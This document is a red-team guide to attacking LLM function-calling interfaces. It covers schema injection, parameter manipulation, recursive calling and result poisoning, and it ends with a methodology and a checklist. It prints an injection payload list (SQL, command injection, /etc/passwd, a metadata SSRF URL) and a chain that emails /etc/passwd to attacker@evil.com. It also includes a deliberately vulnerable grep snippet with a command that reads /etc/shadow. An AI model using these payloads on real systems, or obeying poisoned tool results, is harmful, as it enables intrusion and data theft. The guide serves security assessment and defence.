Function Calling Exploitation
Overview of how LLM function/tool calling works, the attack surface it creates, and systematic approaches to exploiting function calling interfaces in AI systems.
Function calling -- also referred to as tool use -- is the mechanism by which LLMs interact with external systems. Rather than generating free-text responses, the model outputs structured JSON specifying a function name and parameters. An orchestration layer executes the function and returns results to the model. This capability transforms a language model from a text generator into an autonomous agent, and every function registered with the model becomes an attack surface.
How Function Calling Works
The function calling pipeline has four stages, each with distinct security implications:
| Stage | What Happens | Attack Surface |
|---|---|---|
| Registration | Developer defines function schemas (name, description, parameters, types) | Schema injection: malicious content in descriptions or parameter definitions |
| Selection | Model decides which function to call based on conversation context | Selection manipulation: steering the model to call unintended functions |
| Invocation | Orchestration layer executes the function with model-generated parameters | Parameter manipulation: crafting malicious values that exploit downstream systems |
| Return | Function results are fed back into the model's context | Result poisoning: injecting instructions via return values to influence subsequent behavior |
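The four stages above can be sketched as a minimal orchestration loop. This is an illustrative skeleton, not any specific provider's API; `TOOLS`, `run_turn`, and the message shapes are assumptions for the example:

```python
import json

# Stage 1 -- Registration: developer-defined schemas the model will see.
TOOLS = {
    "get_weather": {
        "description": "Return current weather for a city",
        "parameters": {"city": {"type": "string"}},
        "handler": lambda city: {"city": city, "temp_c": 21},
    }
}

def run_turn(model_output: str) -> dict:
    """Stages 2-4: the model selects a tool, the orchestrator invokes it,
    and the result is packaged for injection back into the model's context."""
    call = json.loads(model_output)                 # Stage 2 -- Selection
    tool = TOOLS[call["name"]]                      # untrusted name -> registry lookup
    result = tool["handler"](**call["arguments"])   # Stage 3 -- Invocation
    return {"role": "tool", "content": json.dumps(result)}  # Stage 4 -- Return

# A model-generated call, as it might appear in the model's structured output:
msg = run_turn('{"name": "get_weather", "arguments": {"city": "Oslo"}}')
```

Note that every value crossing a stage boundary (the function name, the arguments, the result string) is attacker-influenceable at some point in the pipeline.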
The Function Calling Attack Surface
Provider Implementations
Different providers implement function calling with varying security characteristics:
| Provider | Implementation | Key Difference |
|---|---|---|
| OpenAI | tools parameter with JSON Schema definitions | Supports strict: true for enforced schema validation |
| Anthropic | tools array with input_schema definitions | Tool use results are sent as tool_result content blocks |
| Google (Gemini) | function_declarations with OpenAPI-style schemas | Supports NONE, AUTO, and ANY tool calling modes |
| Open-source (Llama, Mistral) | Provider-dependent, often via special tokens | Schema enforcement varies widely; many have no validation |
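The provider differences above show up concretely in the schema shape. The sketch below follows the publicly documented OpenAI and Anthropic formats; verify field names against the current API references before relying on them:

```python
# OpenAI-style tool definition with enforced schema validation.
openai_tool = {
    "type": "function",
    "function": {
        "name": "send_email",
        "description": "Send an email on the user's behalf",
        "strict": True,  # opt in to enforced schema validation
        "parameters": {
            "type": "object",
            "properties": {
                "to": {"type": "string"},
                "body": {"type": "string"},
            },
            "required": ["to", "body"],
            "additionalProperties": False,  # required when strict is set
        },
    },
}

# Anthropic-style equivalent: same JSON Schema, but under "input_schema"
# at the top level rather than nested inside a "function" object.
anthropic_tool = {
    "name": "send_email",
    "description": "Send an email on the user's behalf",
    "input_schema": openai_tool["function"]["parameters"],
}
```

The open-source caveat in the table matters here: without `strict`-style enforcement, the model can emit parameter names or types the schema never declared, and only the orchestration layer can catch them.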
Attack Classification
Function calling attacks fall into four categories, each targeting a different pipeline stage:
1. Schema Injection -- Manipulating the function definitions themselves to alter model behavior. The model treats schema descriptions as trusted instructions, so adversarial content in descriptions can redirect behavior across all subsequent calls. See Schema Injection.
2. Parameter Manipulation -- Crafting inputs that cause the model to generate malicious parameter values. Type confusion, boundary violations, and injection through parameter values can compromise downstream systems. See Parameter Manipulation.
3. Recursive/Infinite Calling -- Triggering loops where the model repeatedly calls functions, exhausting resources or creating race conditions. Call chain manipulation can cause exponential function invocations. See Recursive Function Calling.
4. Result Poisoning -- Injecting adversarial content in function return values to hijack subsequent model behavior. Since results feed directly into the model's context, they are a powerful indirect injection vector. See Result Poisoning.
Methodology: Assessing Function Calling Security
Enumerate the function surface
Identify all registered functions, their descriptions, parameter schemas, and permission levels. Determine which functions read data vs. write data vs. execute code. Map the trust level of each function's output.
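One way to make this mapping systematic is to bucket every registered function by capability. The naming-convention classifier below is a rough heuristic for illustration; real assessments should read each function's implementation:

```python
# Illustrative classifier: bucket registered tools by capability so the
# highest-risk surface (write/execute) can be reviewed first.
READ_VERBS = ("get", "list", "search", "read", "query")
WRITE_VERBS = ("create", "update", "delete", "send", "write")
EXEC_VERBS = ("run", "exec", "eval", "shell")

def classify(tool_name: str) -> str:
    prefix = tool_name.split("_", 1)[0].lower()
    if prefix in EXEC_VERBS:
        return "execute"
    if prefix in WRITE_VERBS:
        return "write"
    if prefix in READ_VERBS:
        return "read"
    return "unknown"  # flag for manual review

# Hypothetical tool names standing in for a real registry:
surface = {name: classify(name) for name in
           ["search_docs", "send_email", "run_query", "frobnicate"]}
```

Anything landing in `unknown` deserves the same scrutiny as `execute`: ambiguous names often hide the most dangerous behavior.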
Test schema manipulation
Attempt to influence function selection and behavior through adversarial content in user messages that mimics schema formatting. Test whether the application dynamically generates schemas from user-controlled content.
Probe parameter boundaries
For each function, test type confusion (strings where numbers are expected), boundary values (extremely long strings, negative numbers, special characters), and injection payloads (SQL, command injection, path traversal) in parameter values.
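A starting payload set for these probes might look like the following; the specific strings are standard injection test values, and the set should be extended per target:

```python
# A minimal payload set for probing parameter handling.
def boundary_payloads(param_type: str) -> list:
    common = [
        "A" * 10_000,                       # oversized string
        "'; DROP TABLE users; --",          # SQL injection probe
        "$(id)", "; cat /etc/passwd",       # command injection probes
        "../../etc/passwd",                 # path traversal probe
        "http://169.254.169.254/latest/",   # SSRF probe (cloud metadata IP)
    ]
    if param_type == "integer":
        # Type confusion + boundary values where a number is declared
        return common + [-1, 0, 2**63, "42", float("nan")]
    return common

for payload in boundary_payloads("integer"):
    pass  # submit each via the function calling interface and observe handling
```

Two distinct failure modes to watch for: the model refusing to emit the payload (a soft, bypassable control) versus the orchestration layer rejecting it (the control that actually matters).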
Test call chain behavior
Verify whether the model can be induced to call the same function repeatedly, call functions in unintended sequences, or generate function calls that reference other function calls.
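When testing repeated calling, it helps to instrument the transcript. This sketch flags loop-like behavior by counting repeated (name, arguments) pairs; the call-record format is an assumption for the example:

```python
from collections import Counter
import json

def loop_suspects(calls, threshold=3):
    """Return (name, canonical-args) pairs invoked at least `threshold` times."""
    keys = Counter(
        (c["name"], json.dumps(c["arguments"], sort_keys=True)) for c in calls
    )
    return [k for k, n in keys.items() if n >= threshold]

# A transcript where the model was induced into a retry loop:
calls = [{"name": "web_search", "arguments": {"q": "x"}}] * 5
suspects = loop_suspects(calls)
```

Near-identical calls with trivially varied arguments evade exact-match detection like this, which is an argument for rate limits over deduplication.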
Assess result handling
Inject adversarial instructions in function return values and observe whether the model follows them. Test whether results from low-trust functions can influence calls to high-trust functions.
Evaluate orchestration controls
Determine whether the orchestration layer validates parameters before execution, enforces rate limits, implements approval workflows for sensitive functions, and sanitizes results before feeding them back to the model.
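The controls listed above live in the orchestration layer, not the model. A condensed sketch of what "present" looks like, with illustrative names and a deliberately simple type check standing in for full JSON Schema validation:

```python
import time

class Orchestrator:
    """Toy orchestration layer: validation, rate limiting, human approval."""

    def __init__(self, max_calls_per_minute=30, sensitive=("send_email",)):
        self.max_calls = max_calls_per_minute
        self.sensitive = set(sensitive)
        self.calls = []  # timestamps of recent invocations

    def invoke(self, name, args, schema, approve=lambda n, a: False):
        now = time.monotonic()
        self.calls = [t for t in self.calls if now - t < 60]
        if len(self.calls) >= self.max_calls:
            raise RuntimeError("rate limit exceeded")
        for key, spec in schema.items():  # validate before execution
            if not isinstance(args.get(key), spec["py_type"]):
                raise TypeError(f"bad type for parameter {key!r}")
        if name in self.sensitive and not approve(name, args):
            raise PermissionError(f"{name} requires human approval")
        self.calls.append(now)
        return ("executed", name, args)
```

During an assessment, the absence of any one of these checks (confirmed by a payload that should have been blocked but executed) is a finding in itself.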
Common Vulnerable Patterns
Several implementation patterns consistently lead to function calling vulnerabilities:
Dynamic Schema Generation
Applications that build function schemas from user-controlled data (e.g., database column names, API endpoint descriptions) allow attackers to inject adversarial content directly into function definitions:
```python
# VULNERABLE: Schema built from user-controlled database column names
def build_schema(table_name):
    columns = db.get_columns(table_name)  # User-controlled
    return {
        "name": f"query_{table_name}",
        "description": f"Query the {table_name} table",
        "parameters": {
            col.name: {"type": col.type, "description": col.description}
            for col in columns  # Descriptions may contain injection
        },
    }
```
Unrestricted Function Chaining
Applications that allow the model to call unlimited functions without human approval enable escalation chains where low-privilege reads lead to high-privilege writes:
```
web_search("topic") -> read_file("/etc/passwd") -> send_email(to="attacker@evil.com", body=contents)
```
Unvalidated Parameter Pass-Through
Applications that pass model-generated parameters directly to system calls without validation are vulnerable to classic injection attacks (SQL injection, command injection, SSRF) through the function calling interface:
```python
# VULNERABLE: Direct parameter pass-through
import os

def search_files(query: str):
    # Model-generated value is interpolated straight into a shell command
    return os.popen(f"grep -r '{query}' /data/").read()

# Model can generate: query = "'; cat /etc/shadow; echo '"
```
Red Team Checklist
Use this checklist when assessing a function calling implementation:
- Can function schemas be influenced by user-controlled data?
- Are parameter values validated against their declared types and constraints?
- Is there a maximum call depth or rate limit on function invocations?
- Do function results pass through sanitization before entering the model context?
- Are sensitive functions gated behind human approval or elevated authentication?
- Can the model be induced to call functions in unintended sequences?
- Does the orchestration layer log function calls for anomaly detection?
- Are error messages from functions sanitized to prevent injection?
Related Topics
- Schema Injection -- Manipulating function definitions to alter model behavior
- Parameter Manipulation -- Crafting malicious parameter values
- Recursive Function Calling -- Resource exhaustion via call loops
- Result Poisoning -- Hijacking behavior through return values
- MCP Tool Exploitation -- Related attacks on the Model Context Protocol tool interface
References
- OpenAI, "Function Calling" API documentation (2024)
- Anthropic, "Tool Use" API documentation (2024)
- Fang et al., "LLM Agents can Autonomously Exploit One-day Vulnerabilities" (2024)
- OWASP Top 10 for LLM Applications v1.1 -- LLM07: Insecure Plugin Design
- Debenedetti et al., "AgentDojo: A Dynamic Environment to Evaluate Attacks and Defenses for LLM Agents" (2024)